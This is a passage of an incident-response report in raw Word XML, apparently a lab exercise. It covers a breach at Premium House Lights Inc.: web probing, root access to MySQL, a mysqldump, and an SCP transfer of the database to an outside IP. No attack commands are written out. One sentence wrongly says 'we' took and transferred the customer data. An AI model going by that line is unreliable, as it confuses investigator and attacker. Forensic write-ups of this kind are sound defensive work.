              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="581696B7" w14:textId="084FA722" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595386" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Web Server Access Logs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595386 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75A0D3AD" w14:textId="56AAD9DD" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595387" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Shell History Logs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595387 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35E594F3" w14:textId="6112741D" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595388" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Premium House Lights Network Diagram</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595388 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="439006EB" w14:textId="05D54649" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595389" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References &amp; Citations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595389 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22821A88" w14:textId="07663AA5" w:rsidR="00541985" w:rsidRDefault="00541985">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="7E7342D0" w14:textId="77777777" w:rsidR="00541985" w:rsidRDefault="00541985" w:rsidP="00B17A9F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FB68EB" w14:textId="77777777" w:rsidR="00541985" w:rsidRDefault="00541985" w:rsidP="00B17A9F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF68F8F" w14:textId="77777777" w:rsidR="00541985" w:rsidRDefault="00541985" w:rsidP="00B17A9F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56964C66" w14:textId="77777777" w:rsidR="00541985" w:rsidRDefault="00541985" w:rsidP="00B17A9F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B0F20A4" w14:textId="77777777" w:rsidR="00541985" w:rsidRDefault="00541985" w:rsidP="00B17A9F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B94D23" w14:textId="77777777" w:rsidR="00541985" w:rsidRDefault="00541985" w:rsidP="00B17A9F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5722E9" w14:textId="77777777" w:rsidR="00541985" w:rsidRDefault="00541985" w:rsidP="00B17A9F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE9AC11" w14:textId="77777777" w:rsidR="00776399" w:rsidRDefault="00776399" w:rsidP="00B17A9F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1E6914" w14:textId="77777777" w:rsidR="00776399" w:rsidRDefault="00776399" w:rsidP="00B17A9F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF15B95" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc180595373"/>
      <w:r w:rsidRPr="002817B5">
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F533FAA" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">Premium House Lights Inc. suffered a data breach compromising customer information stored in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> database. The hacker accessed the company’s webserver, gained root privileges, and then snatched customer data from the database. It contains the results of the investigation, a description of the incident timeline, technical information, and recommendations for fixing and preventing the problem in the future. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BE431B" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="592167A8" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Toc180595374"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>Incident Timeline</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719273D1" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19/Feb/2022 21:56:11:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> We observed a suspicious HTTP request with two IPs 136.243.111.17 and 138.201.202.232 coming in from a bot which was likely probing the website for flaws. This was recorded but did not seem malicious (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_access_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> (1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>))(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_access_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A720653" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="2369591F" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19/Feb/2022 21:58:22:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> Probing got more aggressive when 138.68.92.163 IP started making multiple 404 HTTP requests, trying to access resources that were not present such as /randomfile1, /archive, /software and so on. These actions indicate the attacker was looking for a weak endpoint (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_access_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> (1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>))(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_access_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8CD23B" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="0469DE5B" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19/Feb/2022 22:00:27:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> Netstat on the webserver, possibly used to look for open ports and active networks (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C83F005" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="1C9BDB0B" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19/Feb/2022 22:00:55:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> The attacker communicated with the MySQL database as root through a socket. They then requested database data (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_access_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222EE5C7" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="7C31C048" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19/Feb/2022 22:01:45:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> An attacker compiled a database dump of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> database with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>mysqldump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> option (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAA84D1" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5"/>
    <w:p w14:paraId="77B606BC" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="009F25F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19/Feb/2022 22:02:26:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>Phl.db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> was synced to remote server with 178.62.228.28 IP via SCP (secure copy) (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63A954" w14:textId="77777777" w:rsidR="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D5F12" w14:textId="0471D777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc180595375"/>
      <w:r w:rsidRPr="002817B5">
        <w:lastRenderedPageBreak/>
        <w:t>Technical Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A50A48" w14:textId="0D77F0F4" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc180595376"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>Attack Origin and Impact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068856B5" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">It arose from unusual IP attempts to probe the webserver and caused a hack. The attacker was able to increase privileges on the webserver and root access to the MySQL database. We retrieved the customer data from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> database and transferred it to another server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37731C9F" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proof:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> SQL statements are executed by an unauthorized user in database access logs, and shell logs indicate that the attacker backed up and exfiltrated the customer database (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>)(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_access_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561DC272" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exfiltration: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>Phl.db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> with customer data transferred to an external IP address 178.62.228.28 this indicates data exfiltration process (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB98294" w14:textId="63DA84EC" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc180595377"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>How Systems Were Accessed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD34893" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t>The attacker took advantage of weaknesses in the webserver, possibly due to poor configurations, and elevated privileges to root. Upon being root, the attacker logged into the MySQL database via socket with root credentials, accessed the customer database, and exported (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_access_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>)(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D93FCF3" w14:textId="512A317E" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:bookmarkStart w:id="5" w:name="_Toc180595378"/>
      <w:r w:rsidRPr="002817B5">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>Inadvertent Mistakes That Let the Accident</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> Happen </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615BF667" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Segmentation:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> Both the webserver and the database were shared VLANs with inadequate network segmentation. This enabled the attacker to jump from the webserver to the database after initial access was gained (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008BEA3" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Poor privilege management:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> The attacker was able to take root access to the webserver, which indicates some weakness of the access control or configuration (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A86384D" w14:textId="77777777" w:rsidR="002817B5" w:rsidRPr="002817B5" w:rsidRDefault="002817B5" w:rsidP="002817B5">
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low database security:</w:t>
      </w:r>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve"> MySQL database access was unauthorized by root. Nothing was being done to limit this type of access on specific hosts, which the attacker could reach via the infected webserver (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_access_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>)(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t>phl_database_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002817B5">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
